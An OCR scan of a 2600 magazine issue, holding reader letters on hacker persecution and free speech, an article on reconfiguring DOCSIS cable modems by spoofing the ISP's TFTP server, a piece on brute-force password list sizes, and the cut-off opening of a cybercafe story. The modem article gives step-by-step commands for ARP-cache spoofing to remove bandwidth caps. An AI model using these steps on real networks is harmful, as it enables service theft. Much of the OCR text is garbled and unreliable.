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pet around school or public firewalls but the problem change their numbers after this rather stupid over- 
is sites like those are always blocked. But the one thing sight. 

they can never block are translator web sites, like Alta 

Vista, All you have to do is enter the URL and change Dear 2600: 

the language from "whatever" to English. Let's say We enjoy wearing brown pants and sniffing your 
you select German to English ih go through, magazine on ad ieti evenings while composing 


change all the German words t ali di: age 
English words, and bam! You are at: me = MM: 





i 


And this is cs strangely haunting as a David Lynch 
film, 


We suggest using Chinese to English since there 
are enough German words with the same apang as 





if you try to ricas ' from 0) E J i ; E Horg. A e 
Dear 2600: a | qe f AN De ra 00: i 
Just wanted to let you guys know you're gine I was in a ie ne in i sacrant, Califor- 


some free advertising. I was reading this humorous Fi- — “IA that I know carries your periodical and | decided to 
nal Fantasy parody when I came across this page check to see if I had your current issue. E was surprised 
showing a character reading 2600 at htp://www.nuk- tO See a fairly large stack of your magazine hiding be- 
learpower.com/comic-/058.htm. I hope I'm not getting hind an issue of something or other. Needless to say, | 
the author of the comic in any trouble. (No, Fm not "ready had that issue so I moved the magazine to un- 
him.) á cover it for other customers. I came to the conclusion 
DephKon1 that it was Intentionally covered when I returned a 
week or so later to discover the same situation. I don’t 
Dear 2600: know if an employee was doing this or someone else 
I wish this letter had more point to it, but it really With a strange hobby, but either way I think it’s a terri- 
doesn't. In the sentence in your Marketplace section of ble way to sell magazines. Perhaps you at 2600 should 
[8:3 and 18:4 (I'd presume more of them) under the Start printing on excessively large paper to increase 
heading "Only subscribers can advertise in 2600!" you visibility. I plan to make it a routine to stop at that 
will notice near the end of the paragraph it says, "In- bookstore to make sure you are kept visible to shop- 
clude your address label or a photocopy so we know Pers. You're probably thinking why don’t I tell the 
you're a subscriber. Send your ad to 2600 Market- shopkeepers’? Well, it just ain't my style. 
place, PO Box 99, Middle Island, NY 11953. Include TheDude 
your address label or photocopy." We appreciate all of our readers who look out for 
Otherwise, I love the publication. Keep up the this sort of thing. Most of the time the people who hide 
good work. The hidden "peace" symbol in 18:3 wasre- Our magazines aren affiliated with the stores. We sim- 
ally neat and I never noticed it until others;pointed it Ply have a lot of enemies who don’ ye ant our views to 
out Later, be eard. Consider it an attáek on all of us. 
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Well, we never noticed this repeating ph 
vou pointed it out so thanks, It's the end ofa 1 


that's been occurring since Spring 1998. Í Ap response to "Consequences" published im 18: 3A 
Dear 2600: “am not sure that everyone is aware of how bad things 
In addition to the article | wrote on Black Ice for have gotten. | think it is horrible that Sklyarov was ar- 
the 18:4 issue of 2600, I would like to mention that ISS rested for violating the DMCA when what was being 
has released a patch for users with Windows XP and done promoted the sale of more eBooks. There are 
2K. There is a hole that will allow "hackers" to execute many injustices that have been done to many good 
computer jacking and crashing. Normal stuff. Just people. As far as I know, I am the first person to be ar- 
thought I should put that out there since it was notin tested for performing a port scan in the process of pro- 
the original write up. tecting a 911 system I was put in charge of. A simple 
Suicidal port scan now seems to be an offense that one can be 
arrested for, While I have been successful at defending 
Dear 2600: | myself so far, it is still something that most computer 
On the Rar Race DVD, as an extra, the producer people don't realize the rest of the world doesn’t un- 
and director do candid calls to the actors in the film, derstand and which therefore must be illegal. Several 
They apparently didn’t know that the touch tones articles have been written on my case, one by Bill 
recorded in the conversations can be used to call the Reilly, whois working on the Elcomsoft (Dmitry Skl- 
actors! yarov's employer) case. It can be seen at 
As a friend of mine put it, "Hey, I got your phone http://www. onlinesecurity. epee may Se d 
number off of the DVD... you should have bought a etail-phparticle_sd=2 firs 
wguirrell" fend a case of this J vos Puan tell you. il is 
Phookadude cult task to unde: fake and fdon't wish it 
A reference lost on anyone who hasn't seen the The devastation to business 2 
film. We imagine same actors wound up having to account is tremendóusañ 
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people understand what is involved. I thank your mag- 

azine for doing a great job on promoting rights and 

telling some of these stories so that the people know 
what is going on. 

Scott Moulton 

System Specialist and Software Engineer 


Dear 2600: 
| was working at Bridgestone Firestone Informa- 
tion Services during the recall, so 1 was already bitter. 
The lawsuit against 2600 is to much... doubt Pll ever 
drive a Ford again. 
Found On Read Dead, cute huh? 
ht 


Dear 2600: 

So I'm out in Omaha visiting my girlfriend over 
the Christmas break, Just before I left I grabbed a 2600 
at B&N to read on the flight home. | flew into Chicago 
and had to switch planes. 

Whenever I fly I ask to sit in emergency exit rows 
in order to get more leg room. Before takeoff, the flight 
attendant stopped by to make sure that | would agree 
to perform emergency tasks if needed. | told her it was 
no problem and continued reading my magazine. 

| was into reading an article when | finally realized 
that we hadn't left the terminal yet, I looked up and a 
man had come onto the plane from the terminal. | 
watched him as he came up to me and said, "Sir, 1 need 
you to step off the plane, please bring your things.” 

Confused, I stood up and walked off the plane. 
Once on the sky-bridge, they informed me that | was 
going to be “screened” again. Before they started | 
asked why, and they replied, "the flight attendant said 
you were reading a terrorist pamphlet." | was confused 
at lirst and then explained to them that it was a maga- 
zine about "computers and electronics.” They then 
asked if they could look at it and had to OK it with the 
pilots before 1 was allowed back on the plane. Oh 
yeah, I had to be "screened" again as well. 

My guess is that she saw the article about "vulner- 
abilities” in "Passport" (regarding the article on Mi- 
crosoft's new -Net Passport stuff). 

I understand that with all of the recent events that 


people are more concerned about security, but 1 think 


there is a place where we need to draw the line. Caus- 
ing a flight to be delayed for more than an hour over 
my reading a magazine is not acceptable. 
Anthony D. Bower 
Please write back to us (paper mail will get a hu- 
man's attention a lot faster) with as much specific in- 
formation on this as possible. When such events occur, 
we need to know exactly who is responsible so they can 
be dealt with as severely as possible. The idea that you 
can be taken off a plane because some dimwit doesn't 
understand your reading. material should be consid- 
ered an affront to every freethinking person alive. 


Dear 2600: 

. leartebelieve it! Absolutely outrageous! Rogers 
has really pissed me ott this time! | called Rogers’ tech 
Support for their cable ternet and I found out that you 
aren't allowed t orun webservers while you are con- 
nected Via” Boras Cable: If you do, then apparently 
you will be found dit and they will come and take 
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your cable modem away. Geez, all T wanted to do was 
run a puny little game server for Unreal Tournament. 
Their tech support guy told me that they scan all of 
their Rogers Cable customers for web servers. | think 
that this is stupid. Why would Rogers do that? Is there 
any way lo circumvent the scans, so that my Unreal 
Tournament server dream can becorne a reality? 
Johnny Slash 
Internet access via a cable modem is not true In- 
ternet access. [t's primarily meant for outgoing traffic, 
not incoming, such as you would be getting on a web 
server This is yet another reason to support your local 
Internet Service Provider who will generally not get in 
your way as to how you choose to use the net. 


Dear 2600: 
Recently I received a chain letter in my inbox: The 
chain letter had a boring poem about two friends who 


‘are too busy in life to speak to each other. When one fi- 


nally decides to visit the other, he turned out to be dead 
from old age. What this has to do with a chain letter 
aside from conveying a moral of ne use, | can't deter- 
mine. The letter had a standard set of instructions. 
Send this letter to a dozen or so people within three 
hours of reading or suffer incredible bad luck. 

[ dug up all the e-mail addresses listed in the e- 
mail and replied back to them, I quoted Robert Frost, 
"The Road Less Traveled,” and told them all to take 
the road less traveled and not forward the chain letter 
on to a dozen other people to venture on into an end- 
less tree of useless e-mail. 

To my surprise. | received several replies from 
people who could not determine how I knew their e- 
mail addresses, even though the e-mail I sent to them 
had the original chain letter within the body. Appar- 
ently, f pissed off a bunch of people making them feel 
foolish for sending the message Lo their friends. If you 
consider it, it’s thinking only about yourself that drives 
you to ship off an e-mail to all your friends so they can 
take on the burden of bad luck if they don’t spam oth- 
ers within three hours of reading. 

To make a long story short, I was supposedly re- 
ported to some Internet security agencies and told | 
wasn't aware of the repercussions of my actions. 

Tell me I don’t have the right to free speech, 
"Nicolai... you don't have the right to free speech." 
There we have it. 

Nicolai 


Dear 2600: 

I just wanted to write a quick letter to you guys 
telling you that I e-mailed Ford informing them that | 
was boycotting (and encouraging everyone | knew to 
boycott) them due to the legal actions they were taking 
against 2600. I told them that freedom of speech is 
probably the most important freedom we have as 
Americans and that | could not accept them taking le- 
gal actions to prevent said freedom. Thanks for the 
great magazine and website, guys. If you keep writing, 
PI keep reading. 

Sunfist 


Dear 2600: 
Why is it that those in power are so afraid of peo- 
ple who they see as a threat to that lui TT nmenrolled 
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in a Business Technology course at my high ‘school. 
li’s sold as some super advanced course, but I person- 
ally find it to be a little below my level, so I find my- 
self spending most of my time helping the instructor 
with little projects.on the side. A few weeks ago we re- 
placed his school-owned piece of shit computer with a 
rather nice Pentium I machine we built ourselves. In 
order to connect to the school network however, we re- 
quired a couple of programs which the system admins 
refuse to give out. Namely Novell Client software and 
some program the teachers use to do attendance and 
gradebooks called STI. After several work orders were 
filed in an attempt to get someone from the tech de- 
partment to come and take care of this issue for us - 
each of which was simply ignored - we decided to take 
matters into our own hands. After a couple of hours 
spent scrolling through every directory on every net- 
work drive on the school server (access to which his 
“teacher access” provided - no hacking was required), 
I managed to find copies of both programs needed. We 
downloaded the software and got our system up and 
running. Yesterday he was called into a meeting. with 
the Superintendent of Schools and accused of using his 
class to train hackers. He is now teaching a restricted 
curriculum. They tell him quite specifically what he 
can and can’t teach. Myself and a few other students 
who had absolutely nothing to do with the alleged at- 
tacks now have our computer privileges closely seruti- 
nized, We also have reason to believe that certain 
individuals in the upper levels of the admin hierarchy 
have been sabotaging our equipment, Ultimately what 
it comes down to is this: the school tech department 
sees myself and a few other students as a free source of 
labor which the school board can tap to do their jobs. 
This threatens their paycheck, so we're on the shit list, 
| have three months to go until | graduate high school 
and get rd of all this bullshit once and for all. Im bit- 
ing my tongue and resisting the urge to do some real 
damage. Why is it that people in power seem to go out 
of their way to threaten, anger, and ultimately push 
perfectly legitimate hackers to do the kind of things 
that give us a bad rep? I'd have to say that not wanting 
lo restrict future generations even further is the only 
reason I haven't done such things yet. Just three more 
months. 
Ghent 
Even if vou were the last class of seniors in yonr 
hich school, destruction wouldn't be the answer. Noth- 
ing would make the morons who antagonize you hap- 
pier What's important is for you to reveal their 
stupidity in ways that non-technical people can under- 
stand, You've indicated that there is a paper trail 
which would prove that you attempted to get help from 
the tech department and that they ignored you, Assum- 
ing you didn't violate any software licenses in doing 
what you did, it should be a snap to prove that you did 
nothing wrong. There's no reason why you cant far 
vheouldn't) continue to help with this after you're gone. 


Dear 2600; 

] was pretty disgusted when a friend of mine told 
me about a new kids’ show that his kids were watch- 
ing. It's called Cyberchase and the URL is at: 
hitp://pbskids.org/cyberchase/meet_hacker. html. 

He said, "I haven't seen more than two minutes of 
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it, but the gist of the show is that hackers are bad. In 
fact, my kids now call each other “hacker” as a put- 
down." | 

They are planting seeds I tell ya. I like PBS but af- 
ter seeing this, I'm gomg to write a short note to the 
pbskids.org site (unless you have a better contact), just 
to let them know how | feel about this ‘toon. 

Just thought Pd pass along this info, Maybe others 
might want to rethink donations or write a (nice) short 
note. 

johnnyfulcrum 
fry essential that people express their feelings 
about this since its a really unfair characterization. 
Contact your local PBS station as well as PBS, the 
Corporation for Public Broadcasting, anid the Na- 
tional Science Foundation, all af whom provide fund- 
ing. It’s bad enough to have the evil character be a 
hacker but for his actual name to be Hacker is a bit 
much, 


Dear 2600: 

I had nothing to do last Monday so I went to a lec- 
ture given by Janet Reno at my college. 1 was bored, 
and I thought that she might have something intelli- 
gent to say. After announcing that she was running for 
governor in Florida and an unconvincing tirade about 
how we need to "shake up the government system," 
Reno stated that "we need to protect our young chil- 
dren from the hackers that try to seduce them in chat 
rooms and prevent hackers living in other countries 
from stealing funds from America's banking institu- 
tions.” After this broad generalization, | was pissed 
and wrote a question on the paper provided by the 
proctor of the assembly. After a slew of questions 
about health care, the legal system, and even a ques- 
tion about whether Jeb Bush was more intelligent than 
George W. Bush, she neglected to answer "Why are 
hackers still being criminally prosecuted for pointing 
out blatant and potentially dangerous security holes in 
government and business computer networks?" | guess 
our nation's politicians are still unable or unwilling to 
tackle the injustice in our society. 

Polar Mike 

She probably watched an episode of "Cyberchase" 
right before. giving that speech. Children’s cartoons 
are popular with politicians and it explains the level of 
their intellect. Jt would bë a good idea ta keep track of 
all the stupid things they say about hackers. . 


Dear 2600: 

As Lam sure you know, the goddamned SSSCA is 
still being bandied about. This is basically the com- 
plete bending over of customers by the RIAA, MPAA, 
and other lobbying groups. Because Congress is here 
to represent business, nght? This country was started 
on the premise "We hold these truths to be self evident: 
every corporation has the right to as much profit as 
possible, regardless of the rights; health, or well being 
of the citizens of these United States," right? 

_ Here is a ssp website that is vob to pe by 














y Pankaj Arora 
pankajarora € paware.com 
An interesting aspect of cable modem tech- 


nology is the evplution and senda 
(DOC e Cab Se : 










The focus “of this piece ode way 
ISPs configure DOCSIS-compliant cable 
modems and is constructed in a fashion that edu- 
eates the reader on how a cable modem user 
could potentially configure their own device. 
Take very important note, reconfiguring and/or 
tampering with your cable modem not only most 
likely breaks your terms of service agreement but 
could potentially be found illegal in most juris- 
dictions and would then be punishable by law. If 
you wish to experiment, prior permission from 
your cable modem service provider would most 
certainly be necessary. | urge you to educate 
yourself through this writing but not to break the 
rules, and I urge cable modem service providers 
to use the information contained in this article to 
help better protect their service. | have a cable 
modem myself and I respect my cable company 
and the law - but I also highly value free speech 
and learning. | 

This article makes the assumption that the 
reader has prior TCP/IP, networking, and Linux 
knowledge (although this can theoretically be 
done on plenty of other OSes). There are certain 
exceptions to the content of this article and claims 
are based on a generalization of the DOCSIS- 
compliant cable modems that exist on the market 
today as well as my own testing - and the work of 
others. 

How does an ISP configure DOCSIS-compli- 
amt cable modems? To answer that, one should 
first take notice of the interfaces on a cable mo- 
dem. One interface connects to the coaxtal cable 
itself. This is the HFC interface. Another is tradi- 
tionally either Ethernet or USB (or both in some 
models) which is used to connect the cable mo- 
dem to the customer's computer (or other network 
device). This is the CPE interface. As you may al- 
ready know, the device we connect the cable mo- 
dem to will have a hard-coded (but still 
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Sspoofable") MAC address which will be accom- 


panied by an IP address which! is either static or 
dynamically assigned by the I P and of course 


y ~ handled in software. 






However, a few"t Ings most people may not 
know are: 1) The able modem itself has a hard- 
dhd an IP address on the HFC inter- 

The cable modem itself has another IP 


face and (2) The 
“address on the CPE interface. Generally this IP 


address is 192.168.100, 1. 

When you turn your cable modem on, il uses a 
primitive TCP/IP stack and DHCP client to re- 
quest an IP address for the HFC interface. With 
some [SPs the IP address it will receive will be a 
10.x.x.x address. Additionally, upon receiving the 
IP address for the HFC interface, it may also re- 
ceive the IP address for the ISP's Trivial File 
Transfér Protocol (TFTP) server. Upon the mo- 
dem obtaining the IP address for the TFTP server 
it will connect to the server, download a configu- 


rauon file, and use that to setup such things as 


downstream and upstream bandwidth caps. It's a 
rather simple process that usually doesn't take 
more than a minute. 

How would one hypothetically configure a ca- 
ble modem? To configure a cable modem. the first 
thing one would have to do is obtain the IP ad- 
dress of the ISP's TFTP server. For some it may 
actually be the same as the ISP's DHCP server. To 
find the address one could look at the information 
provided by the cable modem’s mini web server 
(which exists on some modems such as certain 
Motorola SurfBoard models and can be accessed 
via the Ethernet/USB interface IP address, e.g. 
192.168.100.1, using a standard web browser). 
Conversely, if that option isn't available or if the 
TFTP server information isn't given via the web 
server, then one could possibly use an SNMP 
chent to scan the modem for that same informa- 
tion. 

Using this same process(es), one would also 
need to obtain the name of the DOCSIS configu- 
ration file the modem downloads since TFTP 
doesn't allow you to list directories and thus a 
specific filename must be known to be able to 
download the configuration file. Once you find 
that out, the next steps are to use a TFTP client to 
download the peros file off the ISP's 
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TFTP server and to use a DOCSIS utility to de- 
code the file into a readable text format, Once you 
decode the configuration file, 1t will look some- 
thing like this: 

Main f 

NetworkAccess 1; 

ClassOfService [ 

ClassID 1: | 

MaxRateDown 1544000; 

MaxRateUp 128000; 

PriorityUp 0; 

GuaranteedUp 0; 

MaxBurstUp 0; 

PrivacyEnable 0; 

/ 

MaxCPE 3; 

/* EndO/[DataMarker */ 

/ 


One could theoretically adjust the settings to 
his or her own preference. For example, setting 
MaxRateUp to 0 would remove any upstream cap 
that may exist on the cable modem's end and set- 
ting MaxRateDown to 0 would do the same for 
downstream. After any changes are made, the file 
can be re-encoded using a DOCSIS utility. Again, 
let me stress to you, know the rules and follow 
them. This information is provided for under- 
standing and was not produced with the intent of 
fostering and/or promoting illegal activities. Be 
smart and keep it legal, but al the same time don't 
be afraid to learn about this technology. 

How would one apply the configuration them- 
selves? The next steps involve running both a 
TFTP server and a time server (since many cable 
modems time-stamp log entries those modems 
make) on the computer/device that is connected 
to the cable modem [CPE interface]. The process 
is rather straightforward: 

|) Place the configuration file in the root di- 
rectory of the TFTP server making sure you use 
the exact same file name your ISP uses. 

2) Depending on what OS you use you may 
want to create an entry m your HOSTS file for the 
modem’'s CPE IP address (since DNS will not be 
available when the cable modem 1s connecting to 
the TFTP server and things such as the standard 
Linux inetd service does not like the lack of DNS 
availability when resolving hostnames - most 
Linux distributions have the HOSTS file at: 
/ete/hosts). 

3) Create an alias IP address on the interface 
your cable modem is connected to. As you may 
have guessed, the alias IP address needs to be the 
IP address of the TFTP server as you are going to 
be doing a little spoofing. Depending on your OS, 
this can be done in a variety of ways. Under 
Linux, with IP Aliasing installed in the kernel, 
one could simply issue the following command: 
config  eth0:l  <ttp server> netmask 
255.255.255.255, Replace <tftp server> with the 
IP address of your ISP's TFTP server of course. If 
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you don't have IP Aliasing built into the kernel or 
otherwise generally available you could just theo- 
retically change your IP address to that of the 
TFTP server for the time being. You will want to 
ensure you set the netmask to 255.255.255.255 to 
avoid unwanted network routes which could 
cause problems. 

4) The next step is to create a static route to 
your cable modem to ensure you are coming from 
the spoofed address. Under Linux one could issue 
the command: route add -host <cpe interface ip 
address> gw <tftp server> again replacing that 
which is in brackets with the proper values. 

5) Once all the preceding setup is complete, 
one would start their TFTP and time server with 
everything in place and start pinging the cable 
modem's CPE IP address and then, while that 1s 
occurring, reset the cable modem (or unplug it for 
a few moments and plug it back in). 

If you were able to get this far and you set 
everything up right, chances are the cable modem 
will download the configuration file from you, 
Once this is complete the aliased address can be 
deleted or the IP address can be set back to DHCP 
or the static address given by your ISP. Addition- 
ally, you can stop pinging. You can verify this 
works via an SNMP query on the CPE interface 
or by just testing the results of any changes made. 

Back up! How does this all make sense’? The 
setup is similar to that of how it is set up on an 
ISP's end, for the most part. The pinging of the 
cable moden's CPE interface "poisons" the ARP 
cache of the cable modem and the resetting of the 
modem flushes the cache so the ISP's TFTP 
server MAC address (the real one) is flushed out. 
This process essentially makes the cable modem 
believe the MAC address of the TFTP server ts 
yours instead of that which belongs to the ISP's 
TFTP server which ~as far as the cable modem is 
concerned - makes you the TFTP server it wants. 
So when it's ready, it will connect to your box and 
get your configuration file, If you have a detailed 
enough understanding of TCP/IP this should 
make sense, If not it’s okay, there are plenty of re- 
sources available to learn more of the fundamen- 
tals. There are many potential barriers an ISP may 
and should put in place to prevent this procedure 
from working. Additionally, some cable modems 
don't allow you to ping the CPE interface until it 
obtains the TFTP configuration file, which would 
essentially prevent the spoofing from working as 
it will cache the correct MAC address before you 
can deliver it the wrong one by pinging it. How- 
ever, for the most part this process tends to work - 
at least for now. 

I hope this article extended your understand- 
ing of how cable modems work and are config- 
ured - the utilities, servers, and services 
mentioned in this article are readily available on 
the web for numerous platforms. 
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Ng by hairball 
| hairball @iilgotten.net 
| In the course of a computer security professional's everyday web surfing, we can t help but come 
| across several programs that can do interesting things with passwords. From the everyday Unix/Linux | 
| password cracker to the Windows brute forcing programs strewn all over the Internet, I see the same sin- | 
gle problem that seems to envelop most of them. Many read from a password list instead of generating 
the passwords as they go. While this makes perfect sense when used with "most common passwords" 
lists and all, when it comes to brute force this is very impractical due to the large number of possible 
password combinations. Let's do a little investigation. | 

As many of you probably already know, the ASCII character set contains a total of 256 unique char- 
acters. Remember that a byte is eight bits, and that a bit is a one or a zero. Therefore, in the range 
00000000-1 1111111, only 256 possibilities exist. So every file in existence can only contain combina- 
tions of these 256 characters and nothing more. Numbered 0-255, each character possible has its own 
ASCII code. The first 32 codes (0-31), when it comes to text files, are control codes. These codes, which | 
date back to MS-DOS 1.0, are passed from program to program to perform certain functions. For exam- 
ple, code 7 is the "bell tone” code. This is the code that causes your computer to send the motherboard the | 
command to make your onboard PC speaker beep. On a PC compatible system, entering a raw ASCII | 
command is as simple as holding down the ALT key and entering its code on the numerical keypad (not 
the one above the letters). 

Here's a simple example: 

1) Open a DOS window (C\COMMAND.COM on most versions of Windows/DOS). 

2) At the command prompt, enter "ECHO", and a space. 

13) Now, hold down the ALT key, and press 7 on the numerical keypad. 

4) Release the ALT key. 

5) Your screen should say something similar to "_..>ECHO%G." 

6) Now, press the enter key. 

Since the DOS command "ECHO" tells your computer to spit back at you what you just entered, it 
will display the control character on your screen. But the code you just entered is not a visible character; 

it is the bell tone code. Instead of "^G" being proudly displayed, one of two things will happen. Depend- 
ing on your system configuration, either your PC speaker will beep (sometimes it will just click on cheap | 
motherboards), or Windows will play the "default beep" sound file that's programmed in the system set- 

tings. In the latter case, Windows simply intercepts the motherboard's beep command and interprets it in- | 
ternally. 

Other cantrol characters include ' backspace” (81, "linefeed” (10). and "character retum" (13). Each of | 
the ASCH control characters also has a simple keyboard command, such as "break" (3) which is) 
CTRL+C. Notice how the above bell tone example displayed ^G on the screen? This is because ALT+7 
and CTRL+G are the same ASCII command character. This is how functions such as CTRL+C (copy) 
and CTRL+V (paste) work in Windows. 

Here's a simple example: 

7) Open a DOS window (again). 

8) At the command prompt, enter "DIR", the DOS command to list the files in the current directory. 
9) Now, hold down the ALT key, and press 13 on the numerical keypad. 

10) Reléase the ALT key. 

11) Notice that the directory was displayed. This is because ALT+13 is the same as enter. 

12) Now, try it again by entering "DIR" at the prompt again. 

13) This time, instead of ALT+13, use CTRL+M, 

14) Notice the same thing happens, because CTRL+M is the same as ALT+13. 

ASCII codes 32-126 are where the common keys are: A-Z, a-z, 0-9, plus all the symbols keys, space, 
and whatnot. 99,9 percent of the time a system password will consist of nothing but these characters. 

ASCII codes 127-255 are the "extended" characters. These codes are characters with accent marks, 
idad de characters, and other such novelties. These characters are e interpreted differently i in 1 DOS and 
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WwW indows environments, and cause a lot of compatibility. issues. For this reason, they are mostly not well | 
| understood by the Windows generation. Ata DOS window, try ALT+ 176, 177, 178, 219, These are shad- | 
ing effects used in old school DOS programs. Also, check out the border drawing set, ALT+ (179-222). 
If you have ever seen a DOS program that draws a border around itself without any graphical modes, this 
is how it does it. | 
| Unix and Linux, because of the nature of the OS itself, can handle passwords made up of almost any 
| combination of almost any of the 256 characters. Unfortunately, passwerd files simply cannot contain all 
of this. The only characters that | know of that can't be used in a Unix/Linux password is code O and 13. 
Remember from the above example that 13 is the same as enter. So how would a password be able to) 
| contain an enter as a character? It can't. Code O is NULL, and entering nothing is nothing. Linux pass- 
words can, however, contain the linefeed character. This is where Windows has some trouble. In Win- 
dows, both a linefeed and carriage return are needed to end a line in a text file. But in Unix/Linux, they | 





ares 


| both perform a different function. 


A linefeed is a control character that says, "Go to the next line.” A carriage return ts a control charac- | , 


ter that says, "Go to the beginning of the line.” So in a normal Windows/DOS text file, each line ends | 
with both a linefeed and a carriage return. Here's an example. 

What your computer sees: 

Joe is COOL.[CR][LF]He likes Cheese Pizza![CR]|LF]DMCA Sucks. 
What you see: 

Joe ts COOL. 

He likes Cheese Pizza! 

DMCA Sucks. 

Your computer displays the first part, "Joe is COOL.” It hits the carriage return code and puts the cur- 
sor back at the beginning of the line - at the J in Joe, Then it hits the linefeed character and takes the cur- 
sor down one spot, right below the J in Joe. which is the beginning of the next line. It continues 

displaying the next line, "He likes Cheese Pizza!" until it hits the CR and LF again and repeats the 
process. This is how each sentence appears to be on its own line, even though a text file is a continuous 
string of data. 

The problem arises when one of the characters is missing. Let's say for some reason the text file does 
not contain the carriage return control characters. | 

What your computer sees: 

Joe is COOL.[LF]He likes Cheese Pizza!{ LF ]DMCA Sucks. | 

What you see: 
Joe is COOL. | 
| 





He likes Cheese Pizza! 
DMCA Sucks. 

This is because the computer displays the first part, "Joe is COOL.", hits the linefeed control charac- 
ler, and spaces the character down one line where it left off. Since there is no carriage return, the com- | 
puter does not reset the cursor at the beginning of the line and it just starts printing where it left off, just 
one line down. 

Now let's say the same text files now have carriage returns, but are missing the linefeeds. 

What the computer sees: 

Joe is COOL.[CR]He likes Cheese Pizza! | CR]IDMCA Sucks. 
What you see: 
DMCA Sucks.eese Pizza! 

This is because the computer prints the first part, "Joe is COOL.", then hits the carriage return control 

character and sets the cursor back to the J in Joe. Then it continues with the next line, "He likes Cheese 

'Pizza!," overwriting what was on the screen before, Since there was no linefeed, the computer did not go 

¿lo the next line. 

| The most common place you may experience problems from CR and LF mismatches is during telnet 
ind terminal sessions. Telnet is not as much of a problem because most servers have adopted the VT 100 
standard, but using a terminal emulator on a modem has been famous for this kind of trouble. Also CR) 
und LF play a major role when using a dot-matrix printer. Anyhow, back to the file formatting. 

This is why sometimes if you copy a text file from one operating system to another, it doesn't open | 
right. There are simple ways to fix this, such as opening them in a program that understands the format, 
then resaving them. But the fact is that Unix/Linux and Windows/DOS use different text file formats, and 
the size of a password file will be larger on a Windows/DOS system than a Unix/Linux system. 

Windows/DOS requires a text file to haye both the linefeed and carriage return codes, while. 
Unix/Linux requires only the carriage return (under most configurations). 

So, let's get to the math. As discussed earlier, a password can contain any of the characters except the 
NULL (code ()) and the carriage return (code 13). So the question is, how big would a text file be > that | 
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contains every possible Unix/Linux password? 
| Let's figure it out. 
For all practical purposes, we are going to assume the password can be made of any ASCH character 
}except O and 13, and that it can be between zero and eight characters long. 
So, of the 256 possible characters, we are going to be using 254 of them. Let's make a chart of the 
possibilities. 
We know that there's only one zero-character password, a blank one. | 
Now, for each of the remaining combinations, we are going to use the formula 254 ^ (number of char- 
acters). This will give the possible combinations of 254 characters for any given length of password. 
¡Number of 0 character passwords: 1 





Number of 1 character passwords: 254 
Number of 2 character passwords: 64,516 
‘Number of 3 character passwords: 16, 387, 064 
Number of 4 character passwords; 4,162,314, 256 
Number of 5 character passwords: 1,057, 227, Gad, 028 
Number of 6 character passwords: 268,535,866,540, 096 
Number of 7 character passwords: 68,208,110,101,184,384 
Number of 8 n a etnies: 17,324, 859,965, 700, 833, 536 
TOTAL: 17,393, 337, 673,075,145, 131 
Whew! That's a lotta passwords! But how much hard disk space will a plain-text list of them all take 
up? 


Well, let’s do more math! 

Let's assume the password list will be stored on a Windows/DOS system. This means that every en- | 
try will require a carriage return and linefeed byte to maintain the text file format. So, here’s the formula. 

Size = [Number of X digit passwords * (X + 2)] 

Breakdown: The space needed on the hard drive to store this set of passwords (in bytes) is equal to the 
number of password combinations in the set, times the length of each password plus 2 (carriage return 
and linefeed). | 

Example; There are 254 one-character combinations. So that’s 254 passwords times a length of three. 

‘Each password is three characters long because of the one-character size, plus the carriage return and 
linefeed, 

Okay, lets form another table. 


X: i ii * (Rigi + 2 we Size in Bytes 
a LENA == Z 
] Ly a amis ar ae Bn E 762 
2 LP (Bees) oo 258,064 
x 16,387,064* "(3342)" 81,935,320 
4: 4,162,314,256 * [44 2) = 24,973, 885,536 
5 1,057,227 821,024 * |5 4 2) = 7,400,594, 747, 168 
6 268,535, 666,540,096 * ( 6 + 2 ) = 2, 146, 286, 932, 320, 768: 
7 68,208,110, 101,184,384 * | 7 +2.) = 613,872, 990,910,659,456 
Bs 17,324,859, 965, 700,933,536 * ( 8 + 2.) = 173, 248,599,657, 008,335, 360 


SS PE. M A O A gg e ee 
<= ASAS >=>==> > === === === ===>» +>» == ===“ =M=mM======EE======>==>»=>-=> 


TUTAL: 173,864, 629,360, 502-142, 436 
So, how big would a Windows/DOS text file that contained every possible Unix/Linux password be? 
Looks like 173,864,628,360.502,142,436 bytes. 
That's 169,789,676.2 Terabytes. 
| Well, this is every possible password ever, but remember I said that 99.9 percent of all passwords only 
¡used characters between ASCII codes 32-126? Lets figure this whole thing out again using this set in- | 
| stead of the whole shebang. 


| Number of 0 character passwords: l 
Number of 1 character passwords: 95 
¡Number of 2 character passwords: 9.025 
Number of 3 character passwords: 857,375 
Number of 4 character passwords: 81,450,625 
Number of 5 character passwords: 7,737,808, 375 
¡Number of 6 character passwords: 735,091, 890, 625. 
| Number of 7 character passwords: 69,833,729,609,375 


Number of 8 character passwords: 6,634,204,312,890,625 


A E A 
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lē: 735,091,890, 625 
T: 69,833,729, 603,375 





eree e ee 





a7 7, 737,803,375 3 


a ee E E E ee ee ee eee se E E a A l 


TOTAL: 


(Digits +2 | = Size in Bytes 


ee es ee AA A AAA ee ee a A oe ee eel eee oe oe et 





488, 703, 750 
54,164,665, 625 
5,880, 735, 125, 000 
629,503,566,484,375 
66,342,043, 128, 906,250 


En ES m ee ee E nn ee ne ne E ee M M ee de Ud Ue a M a‘ ‘M 


AAA Bt at in fet hn a a 


See a seme o o a a Pett a ees Haa iay aa cee ices onion, pee cl ed dd teen Sate 


66,976,482, 088,208,262 


50, a plain-text Windows/DOS format text file containing every possible Unix/Linux password for | 


ASCH characters 32-126 would be: 


66.976,482,088,208,262 bytes which is 65,406.7 Terabytes. 


Quite a large file. 


Perhaps now you can understand why I am forced to laugh when I see a program on a web page or | 
BBS that claims to be able to generate a complete password list using the entire ASCII alphabet. Sure, the 
program probably could do it, if it had two million terabytes to work with. And, oh, it would probably take | 


a few decades too, 


My point being, brute force is a real time-consuming game. It takes raw power that most of us just 
don't have available. If you need to brute force, then you'll need to get a program that generates the pass- 
word list as it goes, therefore making the requirement for free hard drive space a little less. 

While most of you probably knew that a complete password list would be quite a large file, even I was 
guilty of thinking a 40-gig hard drive would handle the job. By writing this article I hope to have opened 
a few people's eyes and save you the wasted time of trying to accomplish something that is, at best, a bad 


dea. 


In conclusion, | have a question. What do you and all the computers you come in contact with all have 


in common? They both are capable of doing whatever the hell you want. Peace Out, 


Greetz: sybah, teknig, radiate, MrT, myke @ LM 
[Special Thanks te Windows Calculator] 


Tran 


by g00gleminer 
g00gleminer € fiberia.com 

| was sitting in a cybercafe recently, daydream- 
ing how nice it would be to remotely access these 
shiny Linux boxen in front of me to hop around the 
net anonymously, I gave ita shot. No shell access - 
someone clueful set up these hosts. I tried to shoul- 
der surf the password out of the bored (but helpful) 
vale worker. My eyes were too slow. D'oh! I tried 
